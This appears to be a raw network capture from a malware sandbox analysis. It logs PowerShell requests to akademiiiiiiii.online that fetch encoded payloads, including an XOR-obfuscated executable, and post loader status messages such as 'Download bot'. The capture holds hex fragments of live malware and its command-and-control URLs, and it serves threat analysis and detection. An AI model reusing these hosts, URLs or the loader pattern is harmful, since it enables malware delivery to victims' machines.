Dec 19, 2024 14:23:55.514923096 CET	1289	IN	Data Raw: cb e0 82 11 29 cb a0 d1 0b 39 0b 4d b8 2b cb 3d 86 4f 06 ac 99 ac 17 41 53 e2 70 77 41 a1 72 f2 6a c8 a6 22 e3 80 b5 8a 83 9f 75 d7 aa dc ad 7f 7a fa e7 b3 1b 86 49 d2 e9 0d fa 51 e0 cb 01 0c eb 0a 57 33 eb 17 50 4b 07 08 4f 8b dd 3c a6 00 00 00 Data Ascii: )9M+=OASpwArj"uzIQW3PKO<PK&Yword/_rels/document.xml.rels0E%u!"MR? &6T0yyU#$Z99Py#$Fg`wz>1u
Dec 19, 2024 14:23:55.514933109 CET	1289	IN	Data Raw: bc cf 8d f7 6b 67 0c ac 1d 6b 72 21 8d 0b 48 1c e8 a0 a3 1f 86 d7 98 f6 14 93 90 91 ad bb de 64 6a 4f bb 81 cc 00 4b 50 b4 11 bc 0b 61 29 5b b0 16 cd 3d 37 aa 50 af 50 9f 1b ea 57 16 cc 70 87 62 8b a4 cb 31 7a 2d c3 c8 6c dc 4e 2b cc 8a 9b 08 cc Data Ascii: kgkr!HdjOKPa)[=7PPWpb1z-lN+ QRm}\&>uBr889xs\|4\|2Vl6-m>$gb>i+$#:QESp+u9#P4Ie&=ON#8' ^^>7?F8`\:j
Dec 19, 2024 14:23:55.514939070 CET	547	IN	Data Raw: 42 a9 ca 3c 83 77 cd 23 f4 6a 72 85 3d 9d e8 7b c5 66 70 c8 d9 c3 6a 9c 59 2d 57 29 39 ab 55 21 5d 1e 83 f9 41 a9 be 09 82 92 8b 07 47 9b f0 8a 0c 9c c9 5f 11 8b f4 1f 42 ec 7b ab c1 44 3d 79 8a 88 cf 98 4d ca 51 03 22 ad c6 3b b1 29 5e d9 b0 91 Data Ascii: B<w#jr={fpjY-W)9U!]AG_B{D=yMQ";)^_i`o*#LQq&[`9;WXn\|KPKbk]PK-&YO<_rels/.relsPK-&Y

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:23:55.551938057 CET	264	OUT	GET /t/ff845948ee2ccbda33aaaf13ec873a62227c6cf41dc3cfb4dda00b71e2aef6952e23c58e5a27974bb20ec802124be99a HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: akademiiiiiiii.online Connection: Keep-Alive
Dec 19, 2024 14:23:56.251787901 CET	1289	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:23:56 GMT Content-Type: application/octet-stream Content-Length: 2650 Connection: keep-alive Cache-Control: no-store,no-cache Pragma: no-cache content-disposition: attachment; filename=image; filename*=UTF-8''image cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wh3d3fu0nBlp4rX%2Bhg640Rr4H2Ym%2FBARNwLO8rxaplL4eiWvDcrMk8bCySz3OWow0S3zo2xFiti%2FnwmSg7yXquIcDal6srIE%2BLSxmY8NIzrH%2BEXkhfsfyQsVbZbrGeOAFI8XF1NeeFxa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1249&min_rtt=1249&rtt_var=624&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=741&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f47b5c0acf71361-ATL server-timing: cfL4;desc="?proto=TCP&rtt=140523&min_rtt=140523&rtt_var=70261&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=264&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 25 68 71 6e 63 6d 77 71 77 67 66 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 50 33 6d 43 5b 31 6d 45 50 56 75 68 53 7b 6d 74 57 47 65 56 64 6c 4c 78 53 6c 34 60 56 44 30 6f 52 32 6e 76 5b 31 71 48 55 6b 43 6b 63 56 79 30 56 6b 43 4a 65 6d 71 48 60 7b 65 44 Data Ascii: %hqncmwqwgf<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#P3mC[1mEPVuhS{mtWGeVdlLxSl4`VD0oR2nv[1qHUkCkcVy0VkCJemqH`{eD
Dec 19, 2024 14:23:56.251810074 CET	1289	IN	Data Raw: 54 56 38 6f 52 54 4f 43 5b 31 71 49 64 49 5b 60 4c 45 47 72 58 7b 4f 4e 60 47 6e 78 57 6f 71 4b 50 32 4c 34 52 54 4f 4b 65 44 79 55 4c 49 53 4c 54 7b 43 31 55 47 4c 76 65 44 6d 70 62 31 34 45 5b 7b 43 4d 52 54 4f 43 5b 31 6d 45 54 6c 38 60 57 31 Data Ascii: TV8oRTOC[1qIdI[`LEGrX{ON`GnxWoqKP2L4RTOKeDyULISLT{C1UGLveDmpb14E[{CMRTOC[1mETl8`W1[sVmiJdjmDLFeSRIP4U2bvR1mEPVeKP0KxVmis[0CUPVmSLkm0[DeVeVSELWWmVDKrRVq{UjOqPVeKP1Gs[F0Fb3SYWVePT1GqVWiBe3KIcFq[VGKvXkH1elGtUo[h`Tj2SGGwUjOqPVeKP1GsXTeV`GqIWomkLYO
Dec 19, 2024 14:23:56.252053976 CET	1213	IN	Data Raw: 46 4b 75 5b 45 43 69 53 49 4f 6f 52 6a 65 73 62 6a 75 34 60 33 65 6d 64 54 47 73 56 56 34 72 4c 47 71 57 53 6f 6d 6b 63 54 58 30 57 32 6d 52 62 47 69 55 50 55 6d 4b 50 30 4b 71 5b 57 69 52 63 47 47 58 52 6f 6d 5b 56 46 79 68 52 6a 65 72 5b 44 6d Data Ascii: FKu[ECiSIOoRjesbju4`3emdTGsVV4rLGqWSomkcTX0W2mRbGiUPUmKP0Kq[WiRcGGXRom[VFyhRjer[DmELVmmS{m4RTSGO1mHLD4E[3uJT0b0LlHxeFyLWWX1X1iJcFL{UoChLkSoR1[1WFWXUkC`W{C0WjeVOFSEOT[hcT43VjereWnyLE[QcG[WTlqoeWHxWkCWL0K4XWb0cjuETlmmVGKrTWiJdWmX`2CMWIONP3esRmmt
Dec 19, 2024 14:23:56.420165062 CET	292	OUT	POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83b41f7dfeb496619cfd7d1f90769f1ff5 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: akademiiiiiiii.online Content-Length: 177
Dec 19, 2024 14:23:56.560672045 CET	177	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 3a 2f 2f 61 6b 61 64 65 6d 69 69 69 69 69 69 69 69 2e 6f 6e 6c 69 6e 65 2f 74 2f 37 61 30 65 33 36 64 38 34 35 32 64 35 35 34 34 37 36 39 33 38 65 33 30 63 64 Data Ascii: [ "\"begin download http://akademiiiiiiii.online/t/7a0e36d8452d554476938e30cd0496a9a4562d83c7a848fbe65b7f7e919bbd3acf746d10e167d6954233a9fb05e9001d\"", "----------"]
Dec 19, 2024 14:23:56.988364935 CET	989	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:23:56 GMT Content-Length: 0 Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7EGZSVM52PqznyCUNmIXP4PWObNiIH7Eih8GQXC2qzQkQYBtAKWSE7ccbGtR1ZJQ6C8dJoKpaGmMjZI3Rfn0L30Mr%2FrZYMli7sBIqHqGrcqpg5obsiNGWtvAQ3oU0FatYY7XGbJFPdTX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=25759&min_rtt=1789&rtt_var=31930&sent=35&recv=37&lost=0&retrans=0&sent_bytes=18060&recv_bytes=10504&delivery_rate=2438752&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f47b5c61b9b1361-ATL server-timing: cfL4;desc="?proto=TCP&rtt=146211&min_rtt=140523&rtt_var=50870&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3791&recv_bytes=733&delivery_rate=20833&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 19, 2024 14:23:57.021728039 CET	240	OUT	GET /t/7a0e36d8452d554476938e30cd0496a9a4562d83c7a848fbe65b7f7e919bbd3acf746d10e167d6954233a9fb05e9001d HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: akademiiiiiiii.online
Dec 19, 2024 14:23:57.449621916 CET	1289	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:23:57 GMT Content-Type: application/octet-stream Content-Length: 15234 Connection: keep-alive Cache-Control: no-store,no-cache Pragma: no-cache content-disposition: attachment; filename=image; filename*=UTF-8''image cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EVy05vokgB8QMlD0JfE75XoruIBNMVlwqqnNn%2BB3QOyuRTdwQ%2FnuX%2FixdxmNoK2xZBKORrkXkXFcrKcZXQbcqBSUEMd92qlzP%2FlqRUX5Ea5%2BFL%2FVkZT%2BZHGWgbSRB5VYw1v9%2Brvq0%2Bj8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1378&min_rtt=1249&rtt_var=171&sent=18&recv=15&lost=0&retrans=0&sent_bytes=19748&recv_bytes=2221&delivery_rate=11295938&cwnd=253&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f47b5c9d8b91361-ATL server-timing: cfL4;desc="?proto=TCP&rtt=149656&min_rtt=140523&rtt_var=45041&sent=8&recv=8&lost=0&retrans=0&sent_bytes=4780&recv_bytes=973&delivery_rate=20833&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 25 6b 64 75 63 68 64 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 58 6a 65 35 63 47 71 43 4c 44 75 4a 53 7b 6a 76 58 54 65 56 64 57 47 59 4f 55 43 69 56 47 71 76 58 33 Data Ascii: %kduchd<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#Xje5cGqCLDuJS{jvXTeVdWGYOUCiVGqvX3
Dec 19, 2024 14:23:57.449882984 CET	1289	IN	Data Raw: 34 56 64 6a 6d 44 4c 46 65 52 4c 6d 58 76 55 47 5b 6a 65 46 47 57 4e 56 6d 69 63 57 5b 70 5b 44 4f 43 65 47 53 75 53 6f 53 60 56 44 34 32 56 57 65 4e 63 44 6d 45 52 6d 4f 68 4c 6b 6a 76 56 44 5b 4e 63 47 6a 7b 57 6f 6d 69 56 47 48 30 54 55 4b 56 Data Ascii: 4VdjmDLFeRLmXvUG[jeFGWNVmicW[p[DOCeGSuSoS`VD42VWeNcDmERmOhLkjvVD[NcGj{WomiVGH0TUKVeVSIWomO`TmoUGWNb0mXUoqKP1qBXl4RbFSucImjVD4SX314`3SYUkCK`TH5RT[jc0qXRlyLWUmqXV0V`lSEPkeKP0KlUF0RbFL{PoO[VFyQVWbycDmELYW`T1GqWkKreWqINUOkdTKGVme`cFKuTlyk`Tmo[mDvR
Dec 19, 2024 14:23:57.449892998 CET	1289	IN	Data Raw: 4b 53 31 57 6f 56 56 34 72 4c 47 71 55 50 6c 69 6b 63 6a 71 6e 5b 57 44 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 60 30 71 75 63 49 4f 60 57 54 6e 30 5b 44 65 56 64 6a 6d 44 4c 46 65 59 4c 54 35 30 58 7b 4f 52 63 46 4b 55 4f 54 71 54 64 Data Ascii: KS1WoVV4rLGqUPlikcjqn[WDvR1mEPVeKP1GoRTOC`0qucIO`WTn0[DeVdjmDLFeYLT50X{ORcFKUOTqTdUWIXWe5cGiTc{[WcW[nVjWFb3KGRkWjS0[7R1ORRlKtPkGjSWqvXjeVTWmXTl8MTUCMSGGw[1mEPVeKP1GoRTOO[0GXPoehRFuoW1T4T1mIWoW[L1n0X1iRbFHxOI[`S0[pX34re3SIcI[h[{CMRTOC[1mEPVeKP1
Dec 19, 2024 14:23:57.449899912 CET	1289	IN	Data Raw: 63 46 4c 7b 54 6f 43 68 63 54 58 76 58 57 62 34 65 54 79 43 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6c 4b 69 57 7b 54 76 56 47 4f 52 65 47 6d 58 60 47 4f 60 56 47 4b 34 58 57 65 56 64 6a 6d 44 4c 46 65 4f 64 6a 47 7b 53 47 47 77 5b 31 Data Ascii: cFL{ToChcTXvXWb4eTyCLDuKP1GoRTOC[1mEPlKiW{TvVGOReGmX`GO`VGK4XWeVdjmDLFeOdjG{SGGw[1mEPVeKP1GoRT[1bFKtTlSJRDqr[DiJOWKIWoO[VFyJXlyNcGjxNYW`RD0oTGOCLTSSc3eKP1GoR0DvR1SSc3eKP1GoRjiJcFSHRkWSLkjyXl4S[0CUPYeDTV8oRTOC[1qITo[jLkW{XkKF`0T{Wlq[Lm[rVjeV`1m
Dec 19, 2024 14:23:57.449915886 CET	1289	IN	Data Raw: 31 47 6f 52 54 4f 43 60 6a 6d 47 63 49 57 6a 63 55 6d 78 56 6d 4c 79 56 47 71 59 52 6d 4f 60 56 44 58 79 56 6d 69 4e 4c 44 6d 48 54 6f 5b 4b 53 30 4b 33 5b 45 48 30 62 33 48 78 53 6c 75 4b 52 47 4b 77 56 6d 4f 42 63 56 47 59 64 46 79 44 54 56 38 Data Ascii: 1GoRTOC`jmGcIWjcUmxVmLyVGqYRmO`VDXyVmiNLDmHTo[KS0K3[EH0b3HxSluKRGKwVmOBcVGYdFyDTV8NP3mC[1mEPVeKP1GoRTOC[1mGcIWjcUmxVmLyVGqYRmO`VDXyVmiNLDmELW[W`3uoRjiVdVKEPYSTL0XvTl0rb0qUPVujS0[1X1W`bFKIWT4E[{CMRTOC[1mEPVeKP1GoRTOC[1m4PjSiS0[pXYmBbGqqPkCiS0Wo
Dec 19, 2024 14:23:57.449923038 CET	1289	IN	Data Raw: 6d 49 57 6f 6d 6b 63 55 6d 34 55 33 6d 43 60 31 75 45 54 6c 5b 4c 60 30 58 31 56 55 4b 56 65 33 53 49 63 49 5b 68 60 55 57 4e 56 6d 69 4e 64 6d 6d 59 5b 46 79 4d 54 31 6d 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 5b 6d 44 76 52 31 6d 45 Data Ascii: mIWomkcUm4U3mC`1uETl[L`0X1VUKVe3SIcI[h`UWNVmiNdmmY[FyMT1mNP3mC[1mEPVeKP1Go[mDvR1mEPVeKP1GoRTOB`mmXTlqiP1H2SGGw[1mEPVeKP1GoRTOC[1mEPVqKSVinXl0Rb0qUPo[jS3irX3mBcFOtRo[kcj0NP3mC[1mEPVeKP1GoRTOC[1mI`I[`W2CpX1in`GmXX3eK`0[4X314dT8qPVuMP0KlUFuVOGjxW
Dec 19, 2024 14:23:57.449930906 CET	1186	IN	Data Raw: 6e 56 6a 4f 42 60 56 48 7b 54 56 6d 51 65 7b 43 4d 54 6a 62 34 4c 33 4b 75 64 49 5b 5b 57 30 47 31 54 6c 30 72 62 30 71 56 5b 49 43 6a 53 33 69 55 56 6d 69 52 64 56 57 55 50 59 53 6a 56 44 71 7b 52 54 4f 4a 63 33 53 48 54 6f 65 51 60 55 69 33 56 Data Ascii: nVjOB`VH{TVmQe{CMTjb4L3KudI[[W0G1Tl0rb0qV[ICjS3iUVmiRdVWUPYSjVDq{RTOJc3SHToeQ`Ui3VWe1`GqIWoSiW3yvXWerbFGY`2WhLkW{XWb0cDv{TY[NWDKsVmeR`0mYWliNS110VVqj`14pSUCOWD4qUTS[e15xUYmQW0G4UWSjcWmpWUWOdlLvVjeWOWqpVYqNdjD0UTSJcD8D[{S``jj{UlqkdD4YUUSOW0j{VV
Dec 19, 2024 14:23:57.680455923 CET	1289	IN	Data Raw: 7b 4b 31 57 47 71 58 54 6b 43 69 57 7b 57 74 58 7b 47 4e 63 46 53 45 50 59 53 53 57 32 69 7b 58 6b 4f 6a 57 46 53 49 53 6f 6d 6a 53 56 79 75 57 45 48 30 50 30 6d 58 54 6b 43 60 56 44 71 76 56 6d 69 4f 5b 31 79 57 54 6f 5b 68 63 6d 4b 54 5b 44 62 Data Ascii: {K1WGqXTkCiW{WtX{GNcFSEPYSSW2i{XkOjWFSISomjSVyuWEH0P0mXTkC`VDqvVmiO[1yWTo[hcmKT[Db4e0OYVjihLly0Vk@4eWGuSkCjS0[4XWeVdj82LDuVW{W4VmejbFL{Tlyk`UGTVUKncGqHWoO`W0KWVWiNbjmELWW[VD4xWF0FeGqUPVmmcD4rX34`bGjxWoWhLkWqXoqG`TmELTShLkWuXWiJeD8qTl0[W2i7VmS{
Dec 19, 2024 14:23:57.853818893 CET	292	OUT	POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83bddbd5f177cce8edaf6f54fdb5f26613 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: akademiiiiiiii.online Content-Length: 140
Dec 19, 2024 14:23:58.416570902 CET	1006	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:23:58 GMT Content-Length: 0 Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZOfIiuSYJUH1U9MEzx0cSP%2BWzZqM%2FwBsSFMHcS7V1pYCXLRkhiRs%2Fk8a9wwuTdSmuPXa5g7CNy74HAm1PNxGwivpHYFaCniPh58zPFREImC4alKocS9tNvLMU%2FZTppD2uRvte1zfC5dD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=12716&min_rtt=1664&rtt_var=10586&sent=3961&recv=1579&lost=0&retrans=0&sent_bytes=5680182&recv_bytes=13088&delivery_rate=45581835&cwnd=300&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f47b5cf0fd21361-ATL server-timing: cfL4;desc="?proto=TCP&rtt=146059&min_rtt=140523&rtt_var=18952&sent=23&recv=14&lost=0&retrans=0&sent_bytes=21185&recv_bytes=1405&delivery_rate=63909&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:24:09.469316006 CET	291	OUT	POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83bddbd5f177cce8edaf6f54fdb5f26613 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: akademiiiiiiii.online Content-Length: 69
Dec 19, 2024 14:24:09.610317945 CET	69	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 53 6c 65 65 70 20 31 30 73 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 62 6f 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Sleep 10s\"", "\"Download bot\"", "----------"]
Dec 19, 2024 14:24:10.316428900 CET	965	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:24:10 GMT Content-Length: 0 Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1UTYfwLGRwuPG2tEU%2Fg24vddy6YB5MbLQF83ZrHAyvqRmfRwZHSolGBI0wfERnEftPBjvtzsyKbIHnUyd5YIIo73f0p4bCTt3Yjz631vL5l6K9b1kxapkb2dmdh7WpNrJCHXlcrQHxVq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1284&min_rtt=1284&rtt_var=642&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=858&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f47b617ab51677e-ATL server-timing: cfL4;desc="?proto=TCP&rtt=141068&min_rtt=141068&rtt_var=70534&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=360&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 19, 2024 14:24:10.341787100 CET	272	OUT	GET /t/50deddaea4c9b7d61413b0607c29d217fb59374de9f6370902e888f276715c81f7bdbec16785b6357d46b2f63cb4eabefc07543b6e01308ce4fa7ff92ceaa0f2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: akademiiiiiiii.online
Dec 19, 2024 14:24:10.801028013 CET	1289	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:24:10 GMT Content-Type: application/octet-stream Content-Length: 6004224 Connection: keep-alive Cache-Control: no-store,no-cache Pragma: no-cache content-disposition: attachment; filename=image; filename*=UTF-8''image cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VAvy3TDkiaD4s24pA6M2c%2BWGZ%2BvMbI69UD95GYmpK%2Bdwz%2FPQ3YkzKnHsZvpPrwWPQYhxSbVf0X84c4WRcf2CmUmlfjKzu2Jjw10Yla0g8BiBIpTm54ossXRG8o8v2OIXRcjJwwU5R%2Bj2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14002&min_rtt=1284&rtt_var=22742&sent=7&recv=9&lost=0&retrans=0&sent_bytes=1509&recv_bytes=2731&delivery_rate=29100&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f47b61d194f677e-ATL server-timing: cfL4;desc="?proto=TCP&rtt=144201&min_rtt=141068&rtt_var=59166&sent=4&recv=5&lost=0&retrans=0&sent_bytes=965&recv_bytes=632&delivery_rate=7758&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 4c 5b 91 01 02 01 01 01 05 01 01 01 fe fe 01 01 b9 01 01 01 01 01 01 01 41 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 f9 01 01 01 0f 1e bb 0f 01 b5 08 cc 20 b9 00 4d cc 20 55 69 68 72 21 71 73 6e 66 73 60 6c 21 62 60 6f 6f 6e 75 21 63 64 21 73 74 6f 21 68 6f 21 45 4e 52 21 6c 6e 65 64 2f 0c 0c 0b 25 01 01 01 01 01 01 01 bc Data Ascii: L[A M Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/%
Dec 19, 2024 14:24:10.801229954 CET	1289	IN	Data Raw: b4 ee 40 f8 d5 80 13 f8 d5 80 13 f8 d5 80 13 f1 ad 13 13 f6 d5 80 13 88 54 81 12 eb d5 80 13 f8 d5 81 13 9b d4 80 13 e8 51 83 12 e9 d5 80 13 e8 51 84 12 f5 d5 80 13 f8 d5 80 13 f9 d5 80 13 e8 51 85 12 8e d5 80 13 b0 50 80 12 f9 d5 80 13 b0 50 82 Data Ascii: @TQQQPPShbiQDe@Zf#(17'AAna
Dec 19, 2024 14:24:10.801243067 CET	1289	IN	Data Raw: 01 74 00 c2 49 8a d1 e8 8b 30 1c 01 49 8c 04 aa d3 3a 01 49 8c 0c 9d d3 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 6c 30 1c 01 49 8c 04 9f d3 3a 01 49 8c 0c 8e d3 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 51 30 1c 01 49 8c 04 d8 d3 3a 01 49 8c 0c cb d3 Data Ascii: tI0I:I:I8tIl0I:I:I8tIQ0I:I:I8tI20I:I:I8tI0I:I:I8tI1I:I:I8tI1I$:I:I8tI1I:Ix:I8tI1
Dec 19, 2024 14:24:10.801251888 CET	1289	IN	Data Raw: 8c 04 0e d7 3a 01 49 8c 0c 01 d7 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 70 2d 1c 01 49 8c 04 3b d7 3a 01 49 8c 0c 2a d7 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 55 2d 1c 01 49 8c 04 2c d7 3a 01 49 8c 0c 1f d7 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 Data Ascii: :I:I8tIp-I;:I:I8tIU-I,:I:I8tI6-I!:I:I8tI-I:I:I8tII:I:I8tIIX:IK:I8tIIM:I<:I8tI*In:Ia
Dec 19, 2024 14:24:10.801261902 CET	866	IN	Data Raw: 0c ee c9 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 51 26 1c 01 49 8c 04 90 e0 68 01 49 8a 01 49 8c 0c d6 c9 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 31 26 1c 01 49 8c 04 78 e0 68 01 49 8a 01 49 8c 0c be c9 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 11 26 Data Ascii: :I8tIQ&IhII:I8tI1&IxhII:I8tI&IhhII:I8tI'IphII:I8tI'IhhII:I8tI'IphII:I8tI'IhhII:I8tIq'
Dec 19, 2024 14:24:11.040997028 CET	1289	IN	Data Raw: c6 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 f1 22 1c 01 49 8c 04 d8 de 68 01 49 8a 01 49 8c 0c ee c7 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 d1 22 1c 01 49 8c 04 c8 de 68 01 49 8a 01 49 8c 0c e6 c7 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 b1 22 1c 01 Data Ascii: :I8tI"IhII:I8tI"IhII:I8tI"IhII:I8tI"IhII:I8tIq"IhII:I8tIQ"IhII:I8tI1"IhhII:I8tI"I
Dec 19, 2024 14:24:11.041009903 CET	1289	IN	Data Raw: c2 49 8a d1 e8 f1 1f 1c 01 49 8c 04 00 dc 68 01 49 8a 01 49 8c 0c 26 c4 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 d1 1f 1c 01 49 8c 04 e8 dd 68 01 49 8a 01 49 8c 0c 1e c4 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 b1 1f 1c 01 49 8c 04 d0 dd 68 01 49 8a Data Ascii: IIhII&:I8tIIhII:I8tIIhII:I8tIIhII:I8tIqIhII:I8tIQIhII:I8tI1IhII:I8tIIxhI
Dec 19, 2024 14:24:11.041260004 CET	1289	IN	Data Raw: 49 8c 04 20 db 68 01 49 8a 01 49 8c 0c 56 c2 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 d1 18 1c 01 49 8c 04 20 db 68 01 49 8a 01 49 8c 0c 46 c2 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 b1 18 1c 01 49 8c 04 10 db 68 01 49 8a 01 49 8c 0c 2e c2 3a 01 49 Data Ascii: I hIIV:I8tII hIIF:I8tIIhII.:I8tIIhII:I8tIqIhII:I8tIQIhII:I8tI1I hII:I8tIIhII:I
Dec 19, 2024 14:24:11.041274071 CET	1289	IN	Data Raw: 01 49 8c 0c 36 c1 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 d1 15 1c 01 49 8c 04 f8 d9 68 01 49 8a 01 49 8c 0c 1e c1 3a 01 49 82 38 01 74 00 c2 49 8a d1 e8 b1 15 1c 01 49 8c 04 e0 d9 68 01 49 8a 01 49 8c 0c 06 c1 3a 01 49 82 38 01 74 00 c2 49 8a d1 Data Ascii: I6:I8tIIhII:I8tIIhII:I8tIIhII:I8tIqIhII:I8tIQIhII:I8tI1IhII:I8tIIphII:I8tI
